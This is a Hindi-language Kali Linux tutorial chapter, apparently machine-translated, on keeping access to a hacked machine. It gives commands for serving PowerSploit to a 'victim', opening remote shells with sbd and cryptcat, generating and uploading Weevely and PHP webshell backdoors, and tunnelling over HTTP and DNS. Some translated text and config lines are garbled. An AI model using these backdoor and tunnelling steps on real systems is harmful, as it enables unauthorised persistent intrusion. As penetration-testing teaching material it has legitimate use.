काली लिनक्स - पहुंच बनाए रखना

इस अध्याय में, हम उन उपकरणों को देखेंगे जो काली कनेक्शन को बनाए रखने के लिए उपयोग करते हैं और हैक की गई मशीन तक पहुंच के लिए भी जब यह कनेक्ट होता है और फिर से डिस्कनेक्ट होता है।

Powersploit

यह एक उपकरण है जो विंडोज मशीनों के लिए है। इसमें पीड़ित मशीन में पॉवरशेल लगाई गई है। यह टूल हैकर को पॉवरशेल के जरिए पीड़ित की मशीन से जुड़ने में मदद करता है।

इसे खोलने के लिए, बाईं ओर टर्मिनल खोलें और पावरप्लोइट फ़ोल्डर में प्रवेश करने के लिए निम्न कमांड टाइप करें -

cd /usr/share/powersploit/

यदि आप टाइप करते हैं “ls”यह उन सभी पॉवरप्लोइट टूल्स को सूचीबद्ध करेगा, जिन्हें आप एक्सेस करने के बाद पीड़ित की मशीन में डाउनलोड और इंस्टॉल कर सकते हैं। उनमें से अधिकांश अपने नाम के अनुसार स्व-स्पष्ट नाम हैं।

पीड़ित के मशीन पर इस टूल को डाउनलोड करने का एक आसान तरीका एक वेब सर्वर बनाना है, जिसे पावरप्लॉइट टूल निम्नलिखित कमांड का उपयोग करके आसानी से बनाने की अनुमति देता है -

python -m SimpleHTTPServer

इसके बाद, यदि आप टाइप करते हैं: http: // <काली मशीन ip_address>: 8000 / निम्नलिखित परिणाम है।

SBD

sbd Netcat के समान एक उपकरण है। यह पोर्टेबल है और इसका उपयोग लिनक्स और माइक्रोसॉफ्ट मशीनों में किया जा सकता है। sbd में AES-CBC-128 + HMAC-SHA1 एन्क्रिप्शन> मूल रूप से, यह किसी विशिष्ट पोर्ट पर किसी भी समय पीड़ित व्यक्ति की मशीन से कनेक्ट करने और दूरस्थ रूप से कमांड भेजने में मदद करता है।

इसे खोलने के लिए, टर्मिनल पर जाएं और टाइप करें “sbd -l -p port” कनेक्शन स्वीकार करने के लिए सर्वर के लिए।

इस मामले में, आइए हम पोर्ट 44 डालें जहां सर्वर सुनेंगे।

पीड़ित की साइट पर, टाइप करें “sbd IPofserver port”। एक कनेक्शन स्थापित किया जाएगा जहां हम दूरस्थ कमांड भेज सकते हैं।

इस मामले में, यह "लोकलहोस्ट" है क्योंकि हमने एक ही मशीन पर परीक्षण किया है।

अंत में, सर्वर पर आप देखेंगे कि निम्न स्क्रीनशॉट में दिखाया गया है।

Webshells

Webshells का उपयोग किसी वेबसाइट को एक्सेस या हैक करने के लिए किया जा सकता है। लेकिन उनमें से ज्यादातर का पता एंटीवायरस द्वारा लगाया जाता है। C99 php शेल एंटीवायरस के बीच बहुत अच्छी तरह से जाना जाता है। कोई भी सामान्य एंटीवायरस आसानी से मैलवेयर के रूप में इसका पता लगा लेगा।

आमतौर पर, उनका मुख्य कार्य वेब इंटरफेस के माध्यम से सिस्टम कमांड भेजना है।

इसे खोलने के लिए, और टाइप करें “cd /usr/share/webshells/” टर्मिनल में।

जैसा कि आप देख रहे हैं, उन्हें प्रोग्रामिंग भाषा के अनुसार कक्षाओं में विभाजित किया गया है: एस्प, एस्पेक्स, सीएफएम, जेएसपी, पेरिप, पीएचपी

यदि आप PHP फ़ोल्डर में प्रवेश करते हैं, तो आप php वेबपेजों के लिए सभी वेबस्पेल देख सकते हैं।

उदाहरण के लिए, वेब सर्वर पर शेल अपलोड करने के लिए “simple-backdoor.php” वेब शेल का वेबपेज और URL खोलें।

अंत में, cmd कमांड लिखें। आपके पास निम्न स्क्रीनशॉट में दिखाई गई सभी जानकारी होगी।

Weevely

Weevely एक PHP वेब शेल है जो टेलनेट-जैसे कनेक्शन का अनुकरण करता है। यह वेब एप्लिकेशन पोस्ट शोषण के लिए एक उपकरण है, और इसका उपयोग एक गुप्त बैकडोर के रूप में या वैध वेब खातों के प्रबंधन के लिए एक वेब शेल के रूप में किया जा सकता है, यहां तक ​​कि मुफ्त होस्ट किए गए।

इसे खोलने के लिए, टर्मिनल पर जाएँ और “weevely” टाइप करें जहाँ आप इसका उपयोग देख सकते हैं।

शेल उत्पन्न करने के लिए, टाइप करें “weevely generate password pathoffile”। जैसा कि निम्नलिखित स्क्रीनशॉट में देखा गया है, यह "डेस्कटॉप" फ़ोल्डर में उत्पन्न होता है और फ़ाइल का उपयोग करने के लिए वेबसर्वर में अपलोड करना है।

निम्नलिखित स्क्रीनशॉट में दिखाए अनुसार वेब शेल अपलोड करने के बाद, हम कमांड का उपयोग करके सर्वर से cmd के साथ जुड़ सकते हैं “weevely URL password” जहां आप देख सकते हैं कि एक सत्र शुरू हो गया है।

http सुरंग

HTTP- सुरंग HTTP अनुरोधों में एक द्विदिश आभासी डेटा स्ट्रीम बनाता है। अनुरोधों को एक HTTP प्रॉक्सी के माध्यम से भेजा जा सकता है यदि ऐसा है तो। यह प्रतिबंधात्मक फ़ायरवॉल के पीछे उपयोगकर्ताओं के लिए उपयोगी हो सकता है। अगर HTTP प्रॉक्सी के माध्यम से WWW एक्सेस की अनुमति है, तो फ़ायरवॉल के बाहर कंप्यूटर से कनेक्ट करने के लिए http-tunnel और telnet या PPP का उपयोग करना संभव है।

सबसे पहले, हमें निम्नलिखित कमांड के साथ एक सुरंग सर्वर बनाना चाहिए -

httptunnel_server –h

फिर, क्लाइंट साइट प्रकार पर “httptunnel_client –h” और दोनों कनेक्शन स्वीकार करना शुरू कर देंगे।

dns2tcp

यह फिर से एक टनलिंग टूल है जो DNS ट्रैफ़िक के माध्यम से टीसीपी ट्रैफ़िक को पास करने में मदद करता है, जिसका अर्थ है यूडीपी 53 पोर्ट।

इसे शुरू करने के लिए, टाइप करें “dns2tcpd”। जब आप स्क्रिप्ट खोलेंगे तब उपयोग को समझाया गया है।

सर्वर साइट पर, फ़ाइल को कॉन्फ़िगर करने के लिए इस कमांड को दर्ज करें।

#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

क्लाइंट साइट पर, यह कमांड दर्ज करें।

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076

इस कमांड से टनलिंग शुरू होगी।

cryptcat

यह Netcat जैसा एक अन्य उपकरण है जो एक पीड़ित के मशीन के साथ एन्क्रिप्टेड तरीके से टीसीपी और यूडीपी कनेक्शन बनाने की अनुमति देता है।

कनेक्शन सुनने के लिए सर्वर शुरू करने के लिए, निम्न कमांड टाइप करें -

cryptcat –l –p port –n

कहाँ पे,

  • -l एक कनेक्शन सुनने के लिए खड़ा है

  • -p पोर्ट नंबर पैरामीटर के लिए खड़ा है

  • -n नाम संकल्प नहीं करने के लिए खड़ा है

क्लाइंट साइट पर, कनेक्शन कमांड है “cryptcat IPofServer PortofServer”